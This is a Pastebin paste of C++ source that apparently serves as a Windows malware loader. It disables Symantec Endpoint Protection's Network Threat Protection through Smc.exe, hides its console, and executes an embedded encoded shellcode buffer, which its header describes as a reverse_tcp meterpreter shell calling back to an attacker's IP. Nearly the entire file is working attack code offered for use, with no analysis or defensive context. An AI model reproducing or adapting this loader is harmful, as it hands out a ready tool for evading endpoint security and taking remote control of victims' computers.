Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /******************************************************************************************
- * Author: @_dark_knight_
- * Description: Bypassing Symantec Endpoint Protection.
- * This creates a reverse_tcp meterpreter shell
- * and stops Network Threat Protection to allow communication out
- * to our attacking IP.
- *
- * Special Notes: Process enumeration code lifted from: http://msdn.microsoft.com/en-
- * us/library/windows/desktop/ms686701(v=vs.85).aspx
- *
- *********************************************************************************************/
- /*- Include files -*/
- #define _WIN32_WINNT 0x0500
- #include <iostream>
- #include <Windows.h>
- #include <tlhelp32.h>
- #include <tchar.h>
- #include <iostream>
- #include <WinBase.h>
- // Forward declarations:
- BOOL KillSymantec( );
- int main()
- {
- /*- Pointer to shellcode memory segment -*/
- LPVOID lpvResult;
- /*- Hide console window -*/
- HWND hWnd = GetConsoleWindow();
- ShowWindow(hWnd, SW_HIDE);
- /*- Kill Symantec Endpoint Encryption if it is running -*/
- KillSymantec();
- /* [*] x86/alpha_mixed succeeded with size 641 (iteration=1) */
- char buf[] = "\x89\xe3\xdd\xc6\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49"
- "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
- "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
- "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
- "\x42\x75\x4a\x49\x59\x6c\x4d\x38\x6e\x69\x77\x70\x33\x30"
- "\x65\x50\x73\x50\x4e\x69\x58\x65\x50\x31\x6a\x72\x72\x44"
- "\x4c\x4b\x36\x32\x56\x50\x6e\x6b\x42\x72\x44\x4c\x4e\x6b"
- "\x61\x42\x55\x44\x6e\x6b\x44\x32\x71\x38\x34\x4f\x48\x37"
- "\x33\x7a\x35\x76\x50\x31\x4b\x4f\x34\x71\x6f\x30\x4c\x6c"
- "\x47\x4c\x45\x31\x51\x6c\x57\x72\x46\x4c\x77\x50\x4a\x61"
- "\x48\x4f\x74\x4d\x76\x61\x48\x47\x6d\x32\x48\x70\x30\x52"
- "\x72\x77\x4e\x6b\x31\x42\x72\x30\x6e\x6b\x30\x42\x75\x6c"
- "\x55\x51\x5a\x70\x6c\x4b\x63\x70\x64\x38\x4e\x65\x39\x50"
- "\x51\x64\x70\x4a\x45\x51\x6a\x70\x70\x50\x6c\x4b\x47\x38"
- "\x75\x48\x6e\x6b\x32\x78\x35\x70\x36\x61\x48\x53\x48\x63"
- "\x67\x4c\x70\x49\x4e\x6b\x46\x54\x6e\x6b\x56\x61\x4b\x66"
- "\x75\x61\x39\x6f\x35\x61\x79\x50\x4c\x6c\x6a\x61\x5a\x6f"
- "\x64\x4d\x46\x61\x6b\x77\x65\x68\x4b\x50\x51\x65\x4b\x44"
- "\x43\x33\x43\x4d\x58\x78\x47\x4b\x43\x4d\x35\x74\x61\x65"
- "\x4a\x42\x71\x48\x6c\x4b\x71\x48\x66\x44\x55\x51\x4b\x63"
- "\x53\x56\x4c\x4b\x44\x4c\x50\x4b\x6e\x6b\x31\x48\x57\x6c"
- "\x75\x51\x4b\x63\x4c\x4b\x46\x64\x4e\x6b\x77\x71\x58\x50"
- "\x4b\x39\x62\x64\x44\x64\x45\x74\x31\x4b\x71\x4b\x71\x71"
- "\x73\x69\x63\x6a\x70\x51\x79\x6f\x4b\x50\x32\x78\x51\x4f"
- "\x52\x7a\x6c\x4b\x54\x52\x5a\x4b\x6f\x76\x43\x6d\x32\x48"
- "\x57\x43\x50\x32\x63\x30\x77\x70\x52\x48\x34\x37\x44\x33"
- "\x65\x62\x53\x6f\x32\x74\x33\x58\x72\x6c\x44\x37\x74\x66"
- "\x66\x67\x59\x6f\x68\x55\x4e\x58\x6a\x30\x53\x31\x53\x30"
- "\x53\x30\x31\x39\x49\x54\x30\x54\x76\x30\x63\x58\x71\x39"
- "\x4b\x30\x52\x4b\x67\x70\x59\x6f\x6a\x75\x70\x50\x66\x30"
- "\x30\x50\x50\x50\x43\x70\x46\x30\x61\x50\x46\x30\x31\x78"
- "\x6a\x4a\x34\x4f\x39\x4f\x6d\x30\x69\x6f\x48\x55\x4d\x47"
- "\x53\x5a\x37\x75\x53\x58\x79\x50\x6e\x48\x63\x31\x45\x34"
- "\x75\x38\x34\x42\x55\x50\x66\x61\x6d\x6b\x6c\x49\x6a\x46"
- "\x63\x5a\x72\x30\x61\x46\x53\x67\x65\x38\x4f\x69\x59\x35"
- "\x30\x74\x70\x61\x59\x6f\x48\x55\x4b\x35\x69\x50\x31\x64"
- "\x36\x6c\x49\x6f\x70\x4e\x67\x78\x51\x65\x6a\x4c\x43\x58"
- "\x7a\x50\x4c\x75\x6f\x52\x72\x76\x49\x6f\x5a\x75\x53\x5a"
- "\x75\x50\x63\x5a\x66\x64\x62\x76\x50\x57\x31\x78\x36\x62"
- "\x48\x59\x48\x48\x53\x6f\x6b\x4f\x38\x55\x4e\x6b\x77\x46"
- "\x72\x4a\x61\x50\x65\x38\x65\x50\x32\x30\x57\x70\x63\x30"
- "\x46\x36\x50\x6a\x47\x70\x53\x58\x56\x38\x49\x34\x53\x63"
- "\x6b\x55\x39\x6f\x6a\x75\x4e\x73\x36\x33\x50\x6a\x73\x30"
- "\x76\x36\x33\x63\x31\x47\x42\x48\x45\x52\x69\x49\x69\x58"
- "\x33\x6f\x6b\x4f\x38\x55\x67\x71\x4f\x33\x65\x79\x4f\x36"
- "\x6b\x35\x49\x66\x43\x45\x7a\x4c\x4b\x73\x41\x41";
- /*- Allocate memory -*/
- lpvResult = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- /*- Copy shellcode to allocated memory -*/
- if (lpvResult != NULL ){
- RtlMoveMemory(lpvResult, buf, sizeof buf);
- ((void(*)())lpvResult)();
- }
- /*- Cleanup -*/
- VirtualFree(lpvResult, 0, MEM_RELEASE);
- }/*- End main -*/
- /*- Enumerate process to confirm client is running Symantec Endpoint Protection.
- * Most of this code lifted from MSDN.
- -*/
- BOOL KillSymantec( )
- {
- HANDLE hProcessSnap;
- PROCESSENTRY32 pe32;
- // Take a snapshot of all processes in the system.
- hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
- if( hProcessSnap == INVALID_HANDLE_VALUE )
- {
- return( FALSE );
- }
- // Set the size of the structure before using it.
- pe32.dwSize = sizeof( PROCESSENTRY32 );
- // Retrieve information about the first process,
- // and exit if unsuccessful
- if( !Process32First( hProcessSnap, &pe32 ) )
- {
- CloseHandle( hProcessSnap ); // clean the snapshot object
- return( FALSE );
- }
- /* Now walk the snapshot of processes, and when we find our target process
- * disable the Network Threat Protection.
- */
- do
- {
- if (_tcscmp(pe32.szExeFile,_T("Smc.exe")) == 0) {
- /*- Disable Network Threat Protection -*/
- system("\"C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp");
- /*- Wait 10 sec for things to settle -*/
- Sleep(10000);
- break;
- }
- } while( Process32Next( hProcessSnap, &pe32 ) );
- CloseHandle( hProcessSnap );
- return( TRUE );
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement